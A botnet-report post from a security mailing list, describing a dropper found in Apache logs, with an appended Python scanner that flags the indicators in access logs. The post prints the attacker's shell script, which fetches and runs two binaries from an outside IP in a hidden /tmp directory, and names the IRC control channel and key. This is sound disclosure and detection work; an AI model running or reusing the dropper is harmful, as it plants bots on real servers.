To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

I found this budding botnet while looking at my Apache logs:
It first instructs the server (via one of many available exploits) to download either of these files (they're both the same):

    http://204.83.56.144/gicupo
    http://204.83.56.144/gicuji

Here's the contents of said file:

    #/bin/sh
    cd /tmp
    mkdir .font-pix
    cd .font-pix
    wget 204.83.56.144/ride
    chmod +x ride
    ./ride
    cd /tmp
    mkdir .font-pix
    cd .font-pix
    wget 204.83.56.144/rider
    chmod +x rider
    ./rider

As you can see, the file downloads two files: "ride" and "rider". The file "ride" is the actual "bot", which connects to the IRC server "irc.ridernet.org", channel "mambolizo", key "leet". The file "rider" is something else which I've yet to analyze, but it's nearly half a megabyte long and appears to contain the code for sending the exploit request to other servers.

I've seen packages like these spreading occasionally, but they usually die out within a week or so because they relied on UnderNet, and although UnderNet has traditionally been a botmaster's paradise, they've been cracking down recently (and they've been VERY responsive with botnet accusations). RiderNet, on the other hand, does not appear to have any functional web site or abuse e-mail address.

_______________________________________________
botnets mailing list
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
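An added example, not part of the original post: a small scanner that checks Apache access-log lines for the indicators named in the message (the download host, the two first-stage file names and the .font-pix staging directory), URL-decoding each request first so encoded and double-encoded requests are not missed. The sample log lines, client addresses, page name and parameter name are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the post above.
INDICATORS = {
    "download_host": re.compile(r"(?<!\d)204\.83\.56\.144(?!\d)"),
    "stage1_script": re.compile(r"/gicu(?:po|ji)\b"),
    "staging_dir": re.compile(r"\.font-pix"),
}

# Apache common/combined log format: client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)

def decode_request(request, max_passes=3):
    """URL-decode repeatedly so single- and double-encoded requests are normalized."""
    for _ in range(max_passes):
        decoded = unquote_plus(request)
        if decoded == request:
            break
        request = decoded
    return request

def scan(lines):
    """Return (client, time, status, matched indicator names) per suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        text = decode_request(m.group("request"))
        names = sorted(n for n, rx in INDICATORS.items() if rx.search(text))
        if names:
            hits.append((m.group("client"), m.group("time"), int(m.group("status")), names))
    return hits

# Constructed sample lines: clients are documentation addresses, and the page
# and parameter names are placeholders that do not come from the post.
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2007:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.9 - - [01/Jan/2007:10:00:05 +0000] "GET /page.php?arg=http%3A%2F%2F204.83.56.144%2Fgicupo HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2007:10:00:09 +0000] "GET /page.php?arg=http%253A%252F%252F204.83.56.144%252Fgicuji HTTP/1.1" 404 208',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit only shows that the request was received; the logged status code does not prove the download ran, so a match is a reason to check the host for the /tmp/.font-pix directory and the "ride" and "rider" files.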
